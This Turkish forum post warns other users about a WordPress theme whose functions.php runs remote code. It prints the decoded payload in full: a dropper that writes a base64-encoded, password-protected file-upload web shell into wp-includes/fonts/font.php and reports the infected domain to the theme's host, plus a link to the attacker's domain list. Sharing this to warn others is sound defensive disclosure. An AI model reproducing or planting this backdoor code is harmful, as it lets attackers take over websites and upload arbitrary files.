Merhaba wp.com.tr den bir blog teması buldum ama kurarken biraz şüpelendim function.php içinde şoyle bir kod buldum

PHP- Kodu:
eval(@file_get_contents(base64_decode("aHR0cDovL3dwLmNvbS50ci93ei50eHQ="))); 

php bilgim oldugu için bir sayfayı çagırdıgını biliyordum burda kodu decode etttim

şöyle bir sayfa çıktı içini açtım ve


PHP- Kodu:
@$dizin = getcwd();
@$yol = $dizin."/wp-includes/fonts/font.php";if ( file_exists( $yol ) ) {
}else {
@touch($yol);
@$h = '<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQpvYl9zdGFydCgpOw0KLyoqDQogKiBIYW5kbGUgVHJhY2tiYWNrcyBhbmQgUGluZ2JhY2tzIFNlbnQgdG8gV29yZFByZXNzDQogKg0KICogQHNpbmNlIDAuNzENCiAqDQogKiBAcGFja2FnZSBXb3JkUHJlc3MNCiAqIEBzdWJwYWNrYWdlIFRyYWNrYmFja3MNCiAqLw0KIA0KIA0KIAkvKioNCgkgKiBNYWtlIHRoZW1lIGF2YWlsYWJsZSBmb3IgdHJhbnNsYXRpb24NCgkgKiBUcmFuc2xhdGlvbnMgY2FuIGJlIGZpbGVkIGluIHRoZSAvbGFuZ3VhZ2VzLyBkaXJlY3RvcnkNCgkgKiBJZiB5b3UncmUgYnVpbGRpbmcgYSB0aGVtZSBiYXNlZCBvbiB3ZWIyZmVlbCwgdXNlIGEgZmluZCBhbmQgcmVwbGFjZQ0KCSAqIHRvIGNoYW5nZSAnd2ViMmZlZWwnIHRvIHRoZSBuYW1lIG9mIHlvdXIgdGhlbWUgaW4gYWxsIHRoZSB0ZW1wbGF0ZSBmaWxlcw0KCSAqLw0KDQoJIC8qKg0KICogRnJvbnQgV29yZFByZXNzIEFKQVggUHJvY2VzcyBFeGVjdXRpb24uDQogKg0KICogQHBhY2thZ2UgV29yZHByZXNzDQogKg0KICogQGxpbmsgaHR0cDovL2NvZGV4LndvcmRwcmVzcy5vcmcvQUpBWF9pbl9QbHVnaW5zDQogKi8NCg0KLyoqDQogKiBFeGVjdXRpbmcgQUpBWCBwcm9jZXNzLg0KICoNCiAqIEBzaW5jZSBXb3JkcHJlc3MgMS40DQogKi8NCg0KLyoqDQogKiBBdXRob3IgVGVtcGxhdGUNCiAqDQogKiBUaGUgdGVtcGxhdGUgZm9yIGRpc3BsYXlpbmcgQXV0aG9yIFByb2ZpbGUgcGFnZXMuDQogKg0KICogQHBhY2thZ2UgV29yZHByZXNzDQogKiBAc3VicGFja2FnZSBUZW1wbGF0ZQ0KICogQHNpbmNlIFdvcmRwcmVzcyAxLjANCiAqLw0KDQovKiBMb2FkcyB0aGUgIkF1dGhvciBGaWx0ZXIgVGVtcGxhdGUiIGJhc2VkIG9uIHRoZSBxdWVyeSB2YXIgImZpbHRlcl90eXBlIg0KICogDQogKi8NCiRkb3N5YXVydWw9JF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KJHUJCT0gJF9HRVRbInUiXTsNCmlmKHN1YnN0cigkZG9zeWF1cnVsLDAsMyk9PSR1ICl7IA0KDQokc2lmcmUJPSBtZDUoJF9QT1NUWyJzaWZyZSJdKTsNCiRidXRvbjIJPSAkX1BPU1RbImJ1dG9uMiJdOw0KaWYoJGJ1dG9uMil7DQoJaWYoJHNpZnJlPT0iNWIxMWZlOTNhMzdjYzNkOTcyNGY5NmY5ZWZkYTJkMzQiKTsNCglzZXNzaW9uX3N0YXJ0KCk7DQoJJF9TRVNTSU9OWyJvdHVydW0iXT1tZDUoJF9QT1NUWyJzaWZyZSJdKTsNCgloZWFkZXIoImxvY2F0aW9uOj91PSIuc3Vic3RyKCRkb3N5YXVydWwsMCwzKSk7DQp9DQoNCmlmKCRfU0VTU0lPTlsib3R1cnVtIl0hPSI1YjExZmU5M2EzN2NjM2Q5NzI0Zjk2ZjllZmRhMmQzNCIpew0KDQoNCg0KDQoNCg0KZWNobyAnPCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5Xb3JkcHJlc3MgQ29udGVudCBGaWxlPC90aXRsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxmb3JtIG1ldGhvZD0icG9zdCIgaWQ9ImZvcm0iIG5hbWU9ImZvcm0iIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPiANCjx0YWJsZSB3aWR0aD0iNTAwIiBib3JkZXI9IjEiIGFsaWduPSJjZW50ZXIiPg0KICA8dHI+DQogICAgDQogICAgPHRkIHdpZHRoPSIzMTUiIHNjb3BlPSJjb2wiPiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InNpZnJlIiBpZD0ic2lmcmUiLz4gPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iYnV0b24yIiBpZD0iYnV0b24yIiB2YWx1ZT0iU2F2ZSIvPiA8L3RkPg0KICA8L3RyPiANCiAgICANCiAgPC90YWJsZT4gIA0KPC9mb3JtPg0KPC9ib2R5Pg0KPC9odG1sPic7DQoNCiB9DQplbHNlew0Kc2Vzc2lvbl9zdGFydCgpOw0KDQoNCiRmaWxlcwk9ICRfRklMRVNbImZpbGVzIl07IDsNCiRwYXRoCT0gJF9QT1NUWyJwYXRoIl07DQokY2hvc2UJPSAkX1BPU1RbImNob3NlIl07DQokc2F2ZQk9ICRfUE9TVFsic2F2ZSJdOw0KJGJ1dG9uCT0gJF9QT1NUWyJidXRvbiJdOw0KJG5hbWUJPSAkZmlsZXNbIm5hbWUiXTsNCg0KJGZpbGVzdAk9ICRmaWxlc1sidG1wX25hbWUiXTsNCg0KaWYoJGJ1dG9uKXsNCglpZigkY2hvc2UgYW5kICRwYXRoKXsNCgkJJHNhdmVfcGF0aD0kcGF0aC4kbmFtZTsNCgkJfWVsc2V7JHNhdmVfcGF0aD0idXBsb2Fkcy8iLiRuYW1lO30NCgkNCgkJJHVwbG9hZD1tb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVzdCwkc2F2ZV9wYXRoKTsNCgkJaWYoJHVwbG9hZCl7JHM9InN1Y2Nlc3NmdWwgaW5zdGFsbGF0aW9uIjt9ZWxzZXskcz0idGhlIGluc3RhbGxhdGlvbiBmYWlscyI7fQ0KCX0NCg0KZWNobyAnDQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPldvcmRwcmVzcyBDb250ZW50IEZpbGU8L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0KPGZvcm0gbWV0aG9kPSJwb3N0IiBpZD0iZm9ybSIgbmFtZT0iZm9ybSIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+IA0KPHRhYmxlIHdpZHRoPSI1MDAiIGJvcmRlcj0iMSIgYWxpZ249ImNlbnRlciI+DQogIDx0cj4NCiAgICA8dGQgd2lkdGg9IjE2OSIgc2NvcGU9ImNvbCI+RmlsZTwvdGQ+DQogICAgPHRkIHdpZHRoPSIzMTUiIHNjb3BlPSJjb2wiPiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiIGlkPSJmaWxlcyIvPiA8L3RkPg0KICA8L3RyPg0KDQogIDx0cj4NCiAgICA8dGQ+Q2hvb3NlIHBhdGg8L3RkPg0KICAgIDx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGF0aCIgaWQ9InBhdGgiICAvPjwvdGQ+DQogIDwvdHI+DQogIDx0cj4NCiAgICA8dGQ+Jm5ic3A7PC90ZD4NCiAgICA8dGQ+PGlucHV0IHR5cGU9ImNoZWNrYm94IiB2YWx1ZT0iMSIgIGNsYXNzPSJjaG9zZSIgbmFtZT0iY2hvc2UiIGlkPSJjaG9zZSIgLz48L3RkPg0KICA8L3RyPg0KICA8dHI+DQogICAgPHRkPlNhdmU8L3RkPg0KICAgIDx0ZD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJidXRvbiIgaWQ9ImJ1dG9uIiB2YWx1ZT0iU2F2ZSIgLz48P3BocCBlY2hvICRzOyA/PjwvdGQ+DQogIDwvdHI+DQo8L3RhYmxlPg0KDQogICAgDQo8L2Zvcm0+DQo8L2JvZHk+DQo8L2h0bWw+DQonOw0KIH0gfSANCmlmKCRfR0VUWyJpc2xlbSJdPT0iY2lraXMiKXsNCglzZXNzaW9uX2Rlc3Ryb3koKTsNCgl9DQo="));?>';
@$kayit = fopen($yol, "a"); 
@fwrite($kayit,$h);
@fwrite($kayit,"\r\r");
fclose($kayit);
 
 if(@function_exists("curl_init")){
 
   @$get_verileri = "a=//".$_SERVER['SERVER_NAME'];
    @$ch = curl_init();
    @curl_setopt( $ch , CURLOPT_URL , "http://wp.com.tr/alankontrol/l.php?".$get_verileri);
    @$veri = curl_exec($ch);
    @curl_close($ch);
}elseif(@function_exists("file_get_contents")){
 
   @file_get_contents("http://wp.com.tr/alankontrol/l.php?a=//".$_SERVER['SERVER_NAME']);
}else{
    //
}
 
 
 
 
 }

oldugunu gordum buyuk ihtimal içlerinde shell var domainleri biyerde tutuyor dikkat etmenizde fayda vardır bilginize.Konu yalnış yerdeyse lütfen beni uyarın moderetorlere bildiriyim dogru kategorisine taşıyalım.



kaydedilen domain listesi

http://wp.com.tr/alankontrol/salo_davaro_salako.txt